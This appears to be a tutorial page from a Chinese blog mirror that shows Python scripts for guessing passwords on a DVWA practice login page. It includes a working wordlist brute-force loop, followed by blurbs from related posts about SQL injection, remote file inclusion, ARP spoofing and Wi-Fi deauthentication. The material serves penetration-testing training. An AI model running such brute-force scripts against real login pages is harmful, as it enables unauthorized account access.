Python Ethical Hacking - WEB PENETRATION TESTING(5)

Guessing Login Information on Login Pages

Our target website: http://10.0.0.45/dvwa/login.php

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "dfdfddfd", "password": "1234", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())

Execute the Python Script.

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "password", "Login": "submit"}
response = requests.post(target_url, data = data_dict)
print(response.content.decode())

#!/usr/bin/env python

import requests

target_url = "http://10.0.0.45/dvwa/login.php"
data_dict = {"username": "admin", "password": "", "Login": "submit"}

with open("password.list", "r") as wordlist_file:
    for line in wordlist_file:
        word = line.strip()
        data_dict["password"] = word
        response = requests.post(target_url, data=data_dict)
        if "Login failed" not in response.content.decode():
            print("[+] Got the password --> " + word)
            exit()

print("[+] Reached end of line.")

原文地址:https://www.cnblogs.com/keepmoving1113/p/11706825.html

时间: 2024-10-22 02:57:42

Python Ethical Hacking - WEB PENETRATION TESTING(5)的相关文章

Python Ethical Hacking - WEB PENETRATION TESTING(3)

CRAWLING SUMMARY Our crawler so far can guess: Subdomains. Directories. Files. Advantages: ->Discover "hidden" paths/paths admin does not want us to know. Disadvantages: -> Will does not discover everything. Solution: -> Analyse discove

Ethical Hacking - Web Penetration Testing(13)

OWASP ZAP(ZED ATTACK PROXY) Automatically find vulnerabilities in web applications. Free and easy to use. It can also be used for manual testing. This is the welcome page. Options Page Scan Policy Setting Page. Attack this target URL http://10.0.0.24

Ethical Hacking - Web Penetration Testing(6)

REMOTE FILE INCLUSION Similar to local file inclusion. But allows an attacker to read ANY file from ANY server. Execute PHP files from other servers on the current server. Store PHP files on other servers as .txt. Pre-Condition: Set allow_url_include

Ethical Hacking - Web Penetration Testing(9)

SQL INJECTION Discovering SQLi in GET Inject by browser URL. Selecting Data From Database Change the number to a big one, then you can get a useful error message. And you can try different number to find the right column. Using “union select 1,2,3,4,

Ethical Hacking - NETWORK PENETRATION TESTING(15)

ARP Poisoning - arpspoof Arpspoof is a tool part of a suit called dsniff, which contains a number of network penetration tools. Arpspoof can be used to launch a MITM attack and redirect traffic to flow through our device. 1. Tell the target client th

Ethical Hacking - NETWORK PENETRATION TESTING(2)

 ALFA  AWUS 1900 https://www.alfa.com.tw/products_detail/2.htm Run the following shell command on Kali Linux and reboot. (Refer to https://forums.kali.org/showthread.php?36296-EXTREME-WIFI-SUPPORT-Alfa-Networks-AWUS1900-WORKING) apt-get install realt

Ethical Hacking - NETWORK PENETRATION TESTING(3)

Change MAC Address using macchanger.  Packet Sniffing Basics Airodump-ng airodump-ng is a program part of the aircrack-ng package, it's a packet sniffer that allows us to capture all the packets that are in our wifi card range. We can also use it to

Ethical Hacking - NETWORK PENETRATION TESTING(5)

Deauthentication Attacks Theory This attack is used to disconnect any device from any network within our range even if the network is protected with a key. Hacker sends de-authentication packets to the router pretending to be the target matching(by s

Ethical Hacking - NETWORK PENETRATION TESTING(4)

Targeted packet sniffing airodump-ng --channel[channel] --bssid[bssid] --write[file-name][interface] Now all the data will be stored in the file name specified after the -write option. We can analyze this data using Wireshark. The only problem is tha